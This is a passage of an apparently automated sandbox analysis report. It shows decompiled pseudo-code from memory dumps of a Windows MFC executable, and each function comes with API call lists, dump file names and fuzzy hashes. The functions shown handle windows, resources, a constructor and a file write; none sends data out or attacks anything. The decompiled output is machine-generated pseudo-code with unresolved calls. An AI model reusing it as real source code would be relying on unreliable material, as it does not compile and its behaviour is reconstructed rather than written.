    					_t13 = SetWindowLongA( *(__ecx + 0x20), 0xfffffff0, __eax | 0x00000100);
    				}
    				_t32 = 0;
    				if(E0040CC69(_t13, _t35) != 0) {
    					_t33 = _t35 + 0xcc;
    					if( *((intOrPtr*)(_t35 + 0xcc)) == 0 &&  *((intOrPtr*)( *_t35 + 0xc0))() != 0) {
    						 *_t33 = 1;
    					}
    					_t34 = _a4;
    					_t16 = _t35 + 0x44;
    					if(_t16 != 0 &&  *((intOrPtr*)(_t16 + 4)) != 0) {
    						 *((intOrPtr*)( *_t34 + 0x30))(_t16);
    					}
    					 *((intOrPtr*)( *_t34 + 0x38))( *((intOrPtr*)(_t35 + 0x40)));
    					_push(1);
    					L0043E024();
    					_t32 = GetStockObject(5);
    				}
    				return _t32;
    			}

    0x0040c7bf
    0x0040c7c1
    0x0040c7c3
    0x0040c7cf
    0x0040c7d9
    0x0040c7d9
    0x0040c7e2
    0x0040c7eb
    0x0040c7f4
    0x0040c7fa
    0x0040c80a
    0x0040c80a
    0x0040c810
    0x0040c814
    0x0040c819
    0x0040c826
    0x0040c826
    0x0040c830
    0x0040c833
    0x0040c837
    0x0040c844
    0x0040c844
    0x0040c84a

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3797#5875LongObjectStockWindow
    • String ID:
    • API String ID: 506942768-0
    • Opcode ID: 034c6b106ecd645e6621a235747fc9ef30b1817533f2a33c9e4ee541e2cda848
    • Instruction ID: e823b5a11dad4170919ef972148863e77ea494cfdecdc0d0cdf712d4536ba130
    • Opcode Fuzzy Hash: 034c6b106ecd645e6621a235747fc9ef30b1817533f2a33c9e4ee541e2cda848
    • Instruction Fuzzy Hash: BE115E31301201DBEB246B25CC88B6B77EAAF88315F05462EE546D72D0DB79E841CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0040D5D7(intOrPtr* __eax, void* __ecx, intOrPtr _a4) {
    				intOrPtr* _t6;
    				void* _t7;
    				intOrPtr _t10;
    				intOrPtr* _t19;
    
    				_t6 = __eax;
    				_t10 = _a4;
    				if( *((intOrPtr*)(_t10 + 4)) != 0x100 ||  *((intOrPtr*)(_t10 + 8)) != 0x1b) {
    					_push(_t10);
    					L0043DE56();
    					if(_t6 != 0) {
    						goto L10;
    					}
    					L0043E1FE();
    					if(_t6 == 0 ||  *((intOrPtr*)(_t6 + 0x54)) == 0) {
    						while(1) {
    							L0043E1F8();
    							_t19 = _t6;
    							if(_t19 == 0) {
    								break;
    							}
    							_t6 =  *((intOrPtr*)( *_t19 + 0x98))(_t10);
    							if(_t6 != 0) {
    								goto L10;
    							}
    						}
    						_push(_t10);
    						L0043E1F2();
    						return _t6;
    					} else {
    						return 0;
    					}
    				} else {
    					L10:
    					_t7 = 1;
    					return _t7;
    				}
    			}

    0x0040d5d7
    0x0040d5d8
    0x0040d5e7
    0x0040d5ef
    0x0040d5f2
    0x0040d5f9
    0x00000000
    0x00000000
    0x0040d5fd
    0x0040d604
    0x0040d612
    0x0040d612
    0x0040d617
    0x0040d61b
    0x00000000
    0x00000000
    0x0040d622
    0x0040d62a
    0x00000000
    0x00000000
    0x0040d62c
    0x0040d635
    0x0040d638
    0x00000000
    0x0040d60c
    0x00000000
    0x0040d60c
    0x0040d630
    0x0040d630
    0x0040d632
    0x00000000
    0x0040d632

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3495#3813#5278#5290
    • String ID:
    • API String ID: 1724265275-0
    • Opcode ID: 1e920aadd781b051facda1a5ac2f92b77a8568ee8b65df60ba5b6014547d077d
    • Instruction ID: 1b490e03bd7bb4afa49857bb798c0971c119661fad0b1d4fa73481467684ef24
    • Opcode Fuzzy Hash: 1e920aadd781b051facda1a5ac2f92b77a8568ee8b65df60ba5b6014547d077d
    • Instruction Fuzzy Hash: 43F0A431B0111197CF251D9A8894B7F928A5B9C784F48483BE40EEB3C1DE7DCC8B96AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E004186D9(void* __ecx, void* __edx, void* __edi) {
    				intOrPtr* _t14;
    				intOrPtr _t18;
    				void* _t24;
    				void* _t25;
    				intOrPtr* _t27;
    				void* _t29;
    
    				_t25 = __edi;
    				_t24 = __edx;
    				_t13 = E0043E4E0(0x440ebe, _t29);
    				_push(__ecx);
    				_push(0x4098);
    				L0043DD54();
    				_t18 = _t13;
    				 *((intOrPtr*)(_t29 - 0x10)) = _t18;
    				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
    				if(_t18 == 0) {
    					_t27 = 0;
    				} else {
    					_t27 = E0041875C(_t18,  *((intOrPtr*)(_t29 + 0x14)));
    				}
    				_push( *((intOrPtr*)(_t29 + 0x10)));
    				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
    				_push( *((intOrPtr*)(_t29 + 0xc)));
    				_push( *((intOrPtr*)(_t29 + 8)));
    				_t14 = L00417800(_t13, _t24, _t25);
    				 *0x4553e4 = _t14;
    				if(_t14 == 0) {
    					_push(8);
    					L0043DD54();
    					 *_t14 = 2;
    					 *((intOrPtr*)(_t14 + 4)) = _t27;
    				} else {
    					if(_t27 != 0) {
    						E004187B7(_t27);
    						_push(_t27);
    						L0043DD42();
    					}
    					_t14 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
    				return _t14;
    			}

    0x004186d9
    0x004186d9
    0x004186de
    0x004186e3
    0x004186e5
    0x004186ea
    0x004186f0
    0x004186f2
    0x004186f5
    0x004186fb
    0x00418709
    0x004186fd
    0x00418705
    0x00418705
    0x0041870b
    0x0041870e
    0x00418714
    0x00418717
    0x0041871a
    0x00418721
    0x00418726
    0x0041873e
    0x00418740
    0x00418746
    0x0041874c
    0x00418728
    0x0041872a
    0x0041872e
    0x00418733
    0x00418734
    0x00418739
    0x0041873a
    0x0041873a
    0x00418753
    0x0041875b

    APIs
    • __EH_prolog.LIBCMT ref: 004186DE
    • #823.MFC42(00004098), ref: 004186EA
    • #825.MFC42(00000000), ref: 00418734
      • Part of subcall function 0041875C: strlen.MSVCRT ref: 00418798
      • Part of subcall function 0041875C: #823.MFC42(00000001,?,?,?,00418705,?), ref: 0041879F
      • Part of subcall function 0041875C: strcpy.MSVCRT(00000000,?,00000001,?,?,?,00418705,?), ref: 004187A8
    • #823.MFC42(00000008), ref: 00418740
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823$#825H_prologstrcpystrlen
    • String ID:
    • API String ID: 958000321-0
    • Opcode ID: cf39adff43fa431d499d8463744971d91b97bf3a91df3d13503021e226e0b4b3
    • Instruction ID: 817bb65b43c2c39b7008b0730998368d4a6c1540c41f2929a5e38aa6ac84cab7
    • Opcode Fuzzy Hash: cf39adff43fa431d499d8463744971d91b97bf3a91df3d13503021e226e0b4b3
    • Instruction Fuzzy Hash: 66012B31901210ABDB15AF65DD067EE7AA1EF48754F20821FF8259A2D1CF7C8D40C75D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0040C4A1(intOrPtr __ecx) {
    				intOrPtr _t46;
    				void* _t51;
    
    				E0043E4E0(0x43fd8e, _t51);
    				_push(__ecx);
    				_t46 =  *((intOrPtr*)(_t51 + 8));
    				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
    				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t46 + 4));
    				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t46 + 8));
    				_push(_t46 + 0xc);
    				L0043DD3C();
    				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
    				_push(_t46 + 0x10);
    				L0043DD3C();
    				_push(_t46 + 0x14);
    				 *(_t51 - 4) = 1;
    				L0043DD3C();
    				 *((intOrPtr*)(__ecx + 0x18)) =  *((intOrPtr*)(_t46 + 0x18));
    				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(_t46 + 0x1c));
    				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t46 + 0x20));
    				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t46 + 0x24));
    				 *((intOrPtr*)(__ecx + 0x28)) =  *((intOrPtr*)(_t46 + 0x28));
    				 *((intOrPtr*)(__ecx)) = 0x4459f4;
    				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
    				return __ecx;
    			}






    APIs
    • __EH_prolog.LIBCMT ref: 0040C4A6
    • #535.MFC42(?,00000001,?,?,0040C35C), ref: 0040C4C9
    • #535.MFC42(?,?,00000001,?,?,0040C35C), ref: 0040C4D9
    • #535.MFC42(?,?,?,00000001,?,?,0040C35C), ref: 0040C4E9
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #535$H_prolog
    • String ID:
    • API String ID: 3656073097-0
    • Opcode ID: dc0f7c126d016f76afa332e406b8e3508f5c4d19d10755abbb7a6b73e34e3b85
    • Instruction ID: e72cd9c46b4ef83a91252c0049fb78f556fd5944464f98d28d248562af3aff17
    • Opcode Fuzzy Hash: dc0f7c126d016f76afa332e406b8e3508f5c4d19d10755abbb7a6b73e34e3b85
    • Instruction Fuzzy Hash: 361195B5A00A46AFC724DF69D540A9AF7F4FB1C314B008A2EA49AC3B40E774F954CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041C9A7(intOrPtr* __ecx, CHAR* _a4, CHAR* _a8) {
    				void* _t12;
    				signed int _t16;
    				struct HRSRC__* _t19;
    				signed int _t21;
    				intOrPtr* _t22;
    
    				_t22 = __ecx;
    				_t19 = FindResourceA( *(__ecx + 4), _a4, _a8);
    				if(_t19 == 0) {
    					L3:
    					return 0;
    				}
    				_t12 = LoadResource( *(_t22 + 4), _t19);
    				if(_t12 == 0) {
    					goto L3;
    				}
    				_t21 = LockResource(_t12);
    				if(_t21 != 0) {
    					_t16 =  *((intOrPtr*)(_t22 + 0x14))( *_t22, _a8, _a4,  *((intOrPtr*)(_t22 + 0xc)), _t21, SizeofResource( *(_t22 + 4), _t19));
    					asm("sbb eax, eax");
    					return  ~_t16 & _t21;
    				}
    				goto L3;
    			}









    APIs
    • FindResourceA.KERNEL32(000000FF,?,?), ref: 0041C9B7
    • LoadResource.KERNEL32(000000FF,00000000,?,00000000,0041C84A,MAINICON,0000000E), ref: 0041C9C7
    • LockResource.KERNEL32(00000000,?,00000000,0041C84A,MAINICON,0000000E), ref: 0041C9D2
    • SizeofResource.KERNEL32(000000FF,00000000,?,00000000,0041C84A,MAINICON,0000000E), ref: 0041C9E6
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Resource$FindLoadLockSizeof
    • String ID:
    • API String ID: 3473537107-0
    • Opcode ID: 7dbe6ec9d1f40b1f841483d7f39943b6eee79a0ca206a847f4c59e4e63ddec48
    • Instruction ID: ce7c5e10deb391afe9709e2c3fd2b888c61de4399f1389f0c930167047dfacf7
    • Opcode Fuzzy Hash: 7dbe6ec9d1f40b1f841483d7f39943b6eee79a0ca206a847f4c59e4e63ddec48
    • Instruction Fuzzy Hash: 52F0AF7A240602EFDB224FA1DD48D67BAEEEF94B81710483AF696D1520DB21CC64DB74
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0041FFA7(intOrPtr __ecx) {
    				void* _t18;
    				void* _t26;
    				void* _t29;
    				void* _t32;
    
    				E0043E4E0(0x441e56, _t32);
    				 *((intOrPtr*)(_t32 - 0x10)) = __ecx;
    				L0043E45C();
    				 *((intOrPtr*)(_t32 - 4)) = 0;
    				 *((intOrPtr*)(__ecx)) = 0x448f90;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0;
    				 *((intOrPtr*)(__ecx + 0x18)) = 0;
    				L0043E456();
    				 *((intOrPtr*)(__ecx + 0x354)) = 0;
    				 *((char*)(__ecx + 4)) = 1;
    				 *((char*)(__ecx + 0x4e)) = 0;
    				 *((char*)(__ecx + 0x152)) = 0;
    				 *((char*)(__ecx + 0x1c)) = 0;
    				 *((intOrPtr*)(__ecx + 8)) = 1;
    				__imp__time(__ecx + 0x10, 0, 0xc8, _t26, _t29, _t18, __ecx);
    				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
    				return __ecx;
    			}








    APIs
    • __EH_prolog.LIBCMT ref: 0041FFAC
    • #287.MFC42(?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFC2
    • #6139.MFC42(00000000,000000C8,?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFE0
    • time.MSVCRT ref: 00420006
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #287#6139H_prologtime
    • String ID:
    • API String ID: 3803556615-0
    • Opcode ID: bcf2162d7701519d6e61dbfcc2a4de1ebf57cfc4f64cc277cbcc54b4640eecfa
    • Instruction ID: 3cb7a4fcf702eff786f76d98b197b9bea49d4350c24df9cbff7fdebb40b8f99c
    • Opcode Fuzzy Hash: bcf2162d7701519d6e61dbfcc2a4de1ebf57cfc4f64cc277cbcc54b4640eecfa
    • Instruction Fuzzy Hash: 760162B1601B40DFD3219F5A884169AFBF9EBA9718F04896FE09A93681C7B46908CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E0042AA9C(CHAR* _a4, void* _a8, long _a12) {
    				long _v8;
    				int _t9;
    				void* _t16;
    
    				_t16 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_t16 != 0xffffffff) {
    					_t9 = WriteFile(_t16, _a8, _a12,  &_v8, 0);
    					_push(_t16);
    					if(_t9 != 0) {
    						CloseHandle();
    						E0042AAFA(_a4);
    						_push(1);
    						_pop(0);
    					} else {
    						CloseHandle();
    						goto L3;
    					}
    				}
    				return 0;
    			}







    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0042AAB6
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042AAD0
    • CloseHandle.KERNEL32(00000000), ref: 0042AADB
    • CloseHandle.KERNEL32(00000000), ref: 0042AAE5
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CloseFileHandle$CreateWrite
    • String ID:
    • API String ID: 3602564925-0
    • Opcode ID: f171812dcc2484ee0f37501904cc352e713ca6273c130dc27d8762dbfe07246c
    • Instruction ID: 33a19ec37105ae79ac05880e22c8d458a6b0843173efb1d81737d5b05106d575
    • Opcode Fuzzy Hash: f171812dcc2484ee0f37501904cc352e713ca6273c130dc27d8762dbfe07246c
    • Instruction Fuzzy Hash: 20F05E36340224BFEB255B60ED0AF9A3A68EF45760F500121FF16A90E0D6F1A9A5C659
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0040CABB(void* __ecx) {
    				int _t8;
    				struct HWND__* _t9;
    				void* _t16;
    				void* _t17;
    
    				_t17 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
    					L10:
    					return _t8;
    				}
    				if( *((intOrPtr*)(__ecx + 0xc4)) == 0) {
    					if(E0040CC69(_t8, __ecx) == 0) {
    						L0043DE32();
    					} else {
    						_push(_t17 + 0x50);
    						L0043E19E();
    					}
    				}
    				_t16 = _t17 + 0x54;
    				if(_t16 != 0) {
    					_t9 =  *(_t16 + 0x20);
    				} else {
    					_t9 = 0;
    				}
    				_t8 = IsWindow(_t9);
    				if(_t8 == 0) {
    					goto L10;
    				} else {
    					_push(1);
    					_push(_t17);
    					_push( *((intOrPtr*)(_t17 + 0x50)));
    					L0043E1A4();
    					return _t8;
    				}
    			}








    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2614#3797#3874#6358Window
    • String ID:
    • API String ID: 975445233-0
    • Opcode ID: 22e690afdaf62ca2f5a5a93fc6fc590069af4ecf50a6cb7f784d3df39ae40140
    • Instruction ID: 29b924dc3d14e5e94e06c4a31e8f699173732524636afe31b7bb9e88633efc79
    • Opcode Fuzzy Hash: 22e690afdaf62ca2f5a5a93fc6fc590069af4ecf50a6cb7f784d3df39ae40140
    • Instruction Fuzzy Hash: 05F06D30701714DBDA30D722E885B6777A8AF84354F000A3FE446A26C0DBBCE806DAA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E00410018() {
    				char _v8;
    				void* __ecx;
    				void* _t12;
    				void* _t13;
    				void* _t20;
    				void* _t21;
    				signed int _t22;
    
    				_t21 = _t13;
    				_t12 = E004101D6(_t21,  &_v8,  *( *(_t21 + 4)),  *(_t21 + 4));
    				L0043DD42();
    				 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
    				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
    				_t22 = 0;
    				__imp__??0_Lockit@std@@QAE@XZ( *(_t21 + 4), _t20, _t13);
    				 *0x4553c4 =  *0x4553c4 - 1;
    				if( *0x4553c4 == 0) {
    					_t22 =  *0x4553c0; // 0x2acaa0
    					 *0x4553c0 =  *0x4553c0 & 0x00000000;
    				}
    				__imp__??1_Lockit@std@@QAE@XZ();
    				if(_t22 != 0) {
    					_push(_t22);
    					L0043DD42();
    				}
    				return _t12;
    			}











    APIs
    • #825.MFC42(?,?,?,?), ref: 00410034
    • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00410047
    • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?), ref: 00410065
    • #825.MFC42(00000000,?,?), ref: 00410070
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #825Lockit@std@@$??0_??1_
    • String ID:
    • API String ID: 2095439190-0
    • Opcode ID: a9e1c3c70cc2f25adff21ca3c350dd2f5c5af8e5ed7366ed5c6dc88546f67dc3
    • Instruction ID: d80ef09a1bb9494872583306faddbe531f07663aa1ddb817dc9b5c5764e80c35
    • Opcode Fuzzy Hash: a9e1c3c70cc2f25adff21ca3c350dd2f5c5af8e5ed7366ed5c6dc88546f67dc3
    • Instruction Fuzzy Hash: 3FF0F632800B109FC724EB40EC06BAA77B8FF49716F01405DE806A7151DBB8BE40CB9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00419CC4(void* __ecx, void* __eflags) {
    				void* _t23;
    				void* _t34;
    				void* _t36;
    
    				E0043E4E0(0x4411fb, _t36);
    				_t34 = __ecx;
    				_push(0);
    				E00427DE2(_t36 - 0x238);
    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    				_push(E00429029(_t36 - 0x10, 0xe06e));
    				 *(_t36 - 4) = 1;
    				L0043DFCA();
    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    				L0043DD36();
    				 *((intOrPtr*)(_t36 - 0x164)) =  *((intOrPtr*)(_t34 + 0x64));
    				L0043DE7A();
    				_t13 = _t36 - 4;
    				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
    				_t23 = E00419D44(_t36 - 0x238,  *_t13);
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return _t23;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 00419CC9
      • Part of subcall function 00427DE2: __EH_prolog.LIBCMT ref: 00427DE7
      • Part of subcall function 00427DE2: #324.MFC42(000000C7,?,?,?,00419CE4,00000000), ref: 00427DFB
      • Part of subcall function 00427DE2: #540.MFC42(000000C7,?,?,?,00419CE4,00000000), ref: 00427E16
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #858.MFC42(00000000,00000000), ref: 00419D03
    • #800.MFC42(00000000,00000000), ref: 00419D0F
    • #2514.MFC42(00000000,00000000), ref: 00419D23
      • Part of subcall function 00419D44: __EH_prolog.LIBCMT ref: 00419D49
      • Part of subcall function 00419D44: #800.MFC42(?,?,00419D37,00000000,00000000), ref: 00419D9E
      • Part of subcall function 00419D44: #641.MFC42(?,?,00419D37,00000000,00000000), ref: 00419DB5
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: H_prolog$#800$#1168#2514#324#537#540#641#858LoadString
    • String ID:
    • API String ID: 3636429178-0
    • Opcode ID: 079a5a0ea27ea08026c5f88583863dd71d13bd13b14e4cd4cc9af8f3e812d7c4
    • Instruction ID: 878488aec4b2856a91e7876fdea7b42093e14cff2befce779b0cd2c99bb2152f
    • Opcode Fuzzy Hash: 079a5a0ea27ea08026c5f88583863dd71d13bd13b14e4cd4cc9af8f3e812d7c4
    • Instruction Fuzzy Hash: 54016D31D103589ADB24EB60E956BEDB774AF14318F10069EA012671D1DFB82F84CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E004097EC(void* __ecx) {
    				void* _t18;
    				signed int _t29;
    				void* _t31;
    
    				E0043E4E0(0x43f85f, _t31);
    				 *(_t31 - 0x10) =  *(_t31 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t31 + 0xc)));
    				_push(_t31 + 0xc);
    				_t18 = E0040FEA7();
    				_t29 = 1;
    				_push(":");
    				 *(_t31 - 4) = _t29;
    				L0043DFD6();
    				_push(_t18 + 1);
    				_push( *((intOrPtr*)(_t31 + 8)));
    				L0043E13E();
    				 *(_t31 - 0x10) = _t29;
    				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
    				return  *((intOrPtr*)(_t31 + 8));
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 004097F1
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42(00453524), ref: 00409818
    • #5710.MFC42(?,00000001,00453524), ref: 00409825
    • #800.MFC42(?,00000001,00453524), ref: 00409834
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800H_prologMessageSend$#2764#535#537#5710#823#825Windowmemset
    • String ID:
    • API String ID: 3942794176-0
    • Opcode ID: f0c625165c78dd5b75b17a3423d9af235c8e44988716e9fcd2b404cc72a2c835
    • Instruction ID: 38d23d530b29cb89d13cd7373147375d43b4f6515e3bb08c437ac0a9450b317e
    • Opcode Fuzzy Hash: f0c625165c78dd5b75b17a3423d9af235c8e44988716e9fcd2b404cc72a2c835
    • Instruction Fuzzy Hash: D0F01D72800158BBDF15EF51D852BDD7B64EB18368F10D41FF4255A181DB78A708CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E004090A3(void* __ecx) {
    				void* _t18;
    				signed int _t28;
    				void* _t30;
    
    				E0043E4E0(0x43f74b, _t30);                      // __EH_prolog: registers the C++ unwind frame whose handler table is at 0x43f74b
